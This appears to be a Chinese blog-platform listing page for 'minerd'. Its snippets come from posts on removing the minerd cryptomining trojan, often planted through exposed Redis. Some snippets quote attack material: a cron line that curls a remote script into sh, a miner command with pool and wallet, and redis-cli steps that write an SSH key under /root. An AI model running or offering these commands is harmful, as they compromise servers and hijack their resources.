minerd

12月威胁态势 | 0day占比超82%!两大勒索家族“均分天下”

在对矿池的持续监控中发现,Bitcoin和Minerd比较活跃,占总类型的16.7%和10.5
亚信安全官方账号·2024-01-15 20:03

威胁态势 | APT攻击组织活跃度上升 新勒索攻击和家族需要关注

在对矿池的持续监控中发现,Minerd类型的挖矿木马较为活跃,占总类型的10.54%,Coinminer.Win64.M
亚信安全官方账号·2024-01-04 08:23

【解决阿里云服务器提示挖矿程序风险2022】

.2.清除定时任务3.修改文件可执行权限4.清除路由表中隐患IP5.在不使用云服务器的情况下可以关闭ssh端口参考资料:解决阿里云服务器提示挖矿程序风险解决阿里云服务器被恶意挖矿问题阿里云服务器被挖矿minerd
Link startC++·2023-11-05 06:15

一次 minerd 肉鸡木马的排查思路

【问题原因】这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较
·2022-08-29 14:40

一次minerd肉鸡木马的排查思路

【问题原因】这种状况在出现时通过top命令可以看到有一个minerd进程占用CP
·2022-08-19 09:05

minerd和kworkerds感染

检测到服务器有异常文件下载,当时没太注意,执行下面操作解决问题(简单针对于minerd处理)1、执行top-i命令查看cpu使用总过高,使用top-l查看到是minerd作祟,2、果断ps-ef|grep
yohoph·2020-09-15 21:30

redis后门导致被挖矿minerd解决办法

参考链接:http://www.cnblogs.com/zhouto/p/5680594.html本次产生挖矿minerd***的主要原因是由于redis的漏洞造成;redis安全:http://blog.knownsec.com
weixin_34117522·2020-08-24 03:23

解决centos被minerd挖矿程序入侵方法

记录一次服务器被入侵的解决方法一:问题说明1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下然后我查看了运行的进程情况(top命令),看到一个名为minerd的进程占用了99.5%
weixin_30781775·2020-08-24 03:21

阿里云服务器被挖矿程序minerd入侵的终极解决办法

突然发现阿里云服务器CPU很高,几乎达到100%,执行topc一看,吓一跳,结果如下:3798root200386m78521272S300.00.14355:11/tmp/AnXqV-B-acryptonight-ostratum+tcp://xmr.crypto-pool.fr:443-u4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8G
Java高知社区·2020-08-24 02:48

minerd木马处理流程

id=dd042b18d979a5b3e9d765bba02c3d77&type=false首先说一句,这木马太恶心了,卧槽首先在服务器发现minerd程序ps-ef|grepminerd然后发现crontab
王孙小蛮·2020-08-05 02:31

Linux清除木马minerd

minerd是什么minerd是挖矿程序,黑客入侵后,会利用宿主cpu进行复杂计算,强占cpu资源,使cpu使用率高达100%今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd
骆驼大笨笨·2020-08-05 00:14

被黑客种下恶意程序进行挖矿的排除案例

0706|shminerd是什么minerd是挖矿程序,黑客入侵后,会利用宿主cpu进行复杂计算,强占cpu资源,使cpu使用率高达
weixin_34066347·2020-07-28 18:01

linux查杀minergate-cli/minerd病毒

先是minerd的病毒入侵,后是minergate-cli入侵。当时以为是服务器的帐号密码被泄漏了,然后对服务器登录的ip一个个检查,对操作的shell一个个核对,都没有发现异常。
weixin_34295316·2020-06-28 16:41

服务器被入侵(minerd挖矿程序)

记录一次服务器被入侵的解决方法一:问题说明1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下然后我查看了运行的进程情况(top命令),看到一个名为minerd的进程占用了99.5%
莫失莫忘Lawlite·2020-06-27 05:59

Linux minerd木马清除(续)

前两天清除了minerd木马之后,服务器一直运行良好。本来以为就这样解决问题了。结果,今天晚上,突然收到监控组的告警,说服务器再度变慢,不但cpu100%了,就是连带宽也100%了。
oarsman·2020-06-24 18:46

木马来袭:(2)今天你被挖矿了吗?

02:46:38/opt/minerd-B-acryp
RiboseYim·2020-03-12 06:24

redis未授权

利用https://paper.seebug.org/409/加固https://help.aliyun.com/knowledge_detail/37447.html阿里云服务器被挖矿程序minerd
极客圈·2019-12-30 03:07

阿里云服务器被挖矿minerd入侵的解决办法

最近阿里云一直再给我发警告短信,发现阿里云服务器CPU很高,我登上服务器后执行top一看,有个进程minerd尽然占用了90%多的CPU,赶紧百度一下,查到几篇文章都有人遇到同样问题Hu_Wen遇到的和我最相似
依然饭太稀·2019-11-29 15:01

阿里云服务器被挖矿minerd入侵的解决办法

今天老大手机报警我检查发现阿里云服务器CPU很高,执行top一看,有个进程minerd尽然占用了90%多的CPU,赶紧百度一下,查到几篇文章都有人遇到同样问题Hu_Wen遇到的和我最相似,下边是他的解决办法
李伟铭MIng·2019-11-28 00:53

linux top下的 minerd 木马清除方法

top命令一查,发现有一个叫做minerd的进程,居然占用了99%的CPU.这个东西一看名字,就不是什么好东西。肯定是别人挂的木马啦。于是,按照常
·2019-09-24 10:02

linux中了minerd之后的完全清理过程(详解)

一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊某天发现cpuload高的出奇,发现一个minerd进程占了大量cpu,google了一下
·2019-09-22 18:01

浪潮云上处理挖矿病毒

16G的内存只有235M,设置了Oracle的sga、pga、memory_target和memory_max_target,并清理了缓冲,内存恢复正常,但问题依旧;2、使用top命令查看进程,发现有2个minerd
Marion0728·2018-09-01 22:52

minerd挖矿

刚开始搞服务器踩过的坑,贴出来分享下,当时应该是centos6。2016年10月15日23:01:55更新攻击教程该问题是因为redis可外网访问的漏洞导致,黑客在定时任务里执行自己的脚本,脚本内容如下:[root@iZ25o9lq6f5Z~]#catpm.sh\?0706exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho"*/1
chunlongyuan·2018-02-05 11:31

阿里云服务器被挖矿病毒minerd***的解决方法

早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之前听说过
宏伟的版图·2017-12-28 13:28

搭建Minerd挖矿程序

minerd是一个比特币挖矿程序,能够运行在服务器上并消耗CPU资源。
zhpfxl·2017-12-25 22:45

Redis挖矿新程序wnTKYg解决方法

wnTKYg同minerd和AnXqV两个一样都是挖矿程序。
开心的小白白白·2017-10-11 16:18

挖矿程序minerd,wnTKYg***分析和解决

挖矿程序minerd,wnTKYg***分析和解决作者:CYH一.起因:最近登陆一台redis服务器发现登陆的时间非常长,而且各种命令敲大显示出的内容延迟很高二,分析:首先我安装了iftop监控em1这个网卡流量
轻狂书生999·2017-09-03 00:28

挖矿程序minerd,wnTKYg***分析和解决

挖矿程序minerd,wnTKYg***分析和解决作者:CYH一.起因:最近登陆一台redis服务器发现登陆的时间非常长,而且各种命令敲大显示出的内容延迟很高二,分析:首先我安装了iftop监控em1这个网卡流量
轻狂书生999·2017-09-03 00:54

k8s被minerd入侵处理

[root@ALY-BJB-GRA-002/]#kubectlgetrcmysql2-oyamlapiVersion:v1kind:ReplicationControllermetadata:creationTimestamp:2017-07-28T07:58:26Zgeneration:1labels:app:mysql2name:mysql2namespace:defaultresourceV
被IT耽误的歌手·2017-07-29 12:22

CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录

执行:top发现,有一个叫做minerd的进程占用了几乎所有cpu资源。百度“centosminerd”,搜索结果显示minerd是一个臭名昭著的比特币挖矿程序,说明服务器已
Dancen·2017-07-18 17:46

阿里云服务器被挖矿minerd***的解决办法

今天老大手机报警我检查发现阿里云服务器CPU很高,执行top一看,有个进程minerd尽然占用了90%多的CPU,赶紧百度一下,查到几篇文章都有人遇到同样问题Hu_Wen遇到的和我最相似,下边是他的解决办法
我不是九爷·2017-05-31 18:17

minerd和wnTKYg进程(病毒)--被攻击CPU占用率达到100%

结果查看发现有两个进程占用CPU100%了,一个是minerd一个是wnTKYg。如果大家遇到请小心。
橡皮24·2017-03-13 23:54

利用redis漏洞远程添加计划任务挖取比特币

记得之前曝光过是一款叫minerd的挖矿程序。这玩意。结束掉进程肯定是不够的。必然有相应的守护进程或者计划任务。查看了crontab。
鱼鱼123·2017-02-22 15:10

Redis未授权访问漏洞

目前比较主流的案例:yam2minerd挖矿程序二.Redis安全漏洞影响一
hu_wen·2017-02-15 10:31

Redis漏洞-中挖矿程序,占用CPU资源

details/51971121记录一次服务器被入侵的解决方法一:问题说明1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下然后我查看了运行的进程情况(top命令),看到一个名为minerd
开心的小白白白·2017-02-03 09:14

Redis安全配置,以防数据库被入侵恶意清空,数据丢失,且dump.rdb文件无法恢复

被攻击后redis里面多了一个crackit表,打开一看发现对方通过入侵自己的redis数据库,然后利用dump文件获得服务器的root权限,企图使用自己的数据库挖矿(minerd,俗称挖比特币)。最
EricGuo55·2017-01-11 21:24

centos 被挖矿病毒 minerd 感染,解除记录

minerd占用了300%的CPU。
千罹·2016-11-07 18:38

阿里云服务器被挖矿minerd入侵的解决办法

上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行top一看,有个进程minerd尽然占用了90%多的CPU,赶紧百度一下,查到几篇文章都有人遇到同样问题Hu_Wen遇到的和我最相似,下边是他的解决办法
ㄓㄤㄑㄧㄤ·2016-11-04 15:00

minerd******处理(2)

杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq其他应用都没有呢我发现我的redis的bind0.0.0.0:6379默认的。。。。应该是这边进来的。我自己做了下尝试。。。[root@ll_sas01~/.ssh]#redis-cli127.0.0.1:6379>setaa"公钥"OK127.0.0.1:6379>configsetdir/roo
aolens·2016-10-26 17:58

minerd******处理(1)

以下是处理过程:***排查1,首先top发现有minerd对CPU的占有达到了100%,此前这台服务器上是没有跑任何应用的,直觉告诉我minerd有问题哦[root@ll_sas01~/.ssh]#psaux
aolens·2016-10-26 17:50

阿里云服务器两次被***挖矿经历

如果你不知道什么事挖矿请自行谷度一下.就在写这个的昨天晚上手机短信不断报警某个服务器达到了负载阈值,打开服务器top了一下发现4核CPU被其中一个程序跑满了,先记录下这个程序的PID然后根据PID找到源文件/opt/minerd
古城寨主·2016-10-17 10:13

minerd挖矿***

由于用的是临时服务器,安全性上疏忽了,导致受到了minerd******,清理的时候,遇到了ntp这个很具有迷惑性的服务,费了一番功夫才敢彻底清理。
古城寨主·2016-09-08 16:30

redis后门导致被挖矿minerd解决办法

参考链接:http://www.cnblogs.com/zhouto/p/5680594.html本次产生挖矿minerd***的主要原因是由于redis的漏洞造成;redis安全:http://blog.knownsec.com
feng945869004·2016-09-08 15:50

阿里云主机遭受minerd类型***

现象:就是cpu使用率超级大,能到300%***脚本内容:export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/rootmkdir -p /var/spool/c
李伯亿·2016-07-22 15:05

阿里云服务器两次被***挖矿经历

如果你不知道什么事挖矿请自行谷度一下.就在写这个的昨天晚上手机短信不断报警某个服务器达到了负载阈值,打开服务器top了一下发现4核CPU被其中一个程序跑满了,先记录下这个程序的PID然后根据PID找到源文件/opt/minerd
鬼魂儿·2016-07-20 10:25

关于服务被挖矿程序minerd入侵解决方法

今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu在opt目录下发现有个异常文件,是个命令文件minerd在确定跟项目不相关的情况下判断是个木马程序,果断kill
hu_wen·2016-07-14 14:57

SSH服务恶意代码分析

查看rc.local系统自启动文件发现可疑启动项/tmp/minerd–XXXXX,可初步
DuishengChen·2016-01-28 16:57

kill掉minerd:别让你的服务器被别人当做挖矿机器

top一下,看看有没有一个叫做minerd的进程,它会周期性地让服务器的CPU使用率飙升至百分之几百甚至上千,如果有,那么你的服务器正在被别人当做挖矿赚钱的苦力!
ByfordLee·2015-12-03 12:00

minerd-exe-removal-guide

    The file minerd.exe is an executable that is widely recognized as a Trojan horse.
oywl2008·2014-02-27 10:00
上一页 1 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他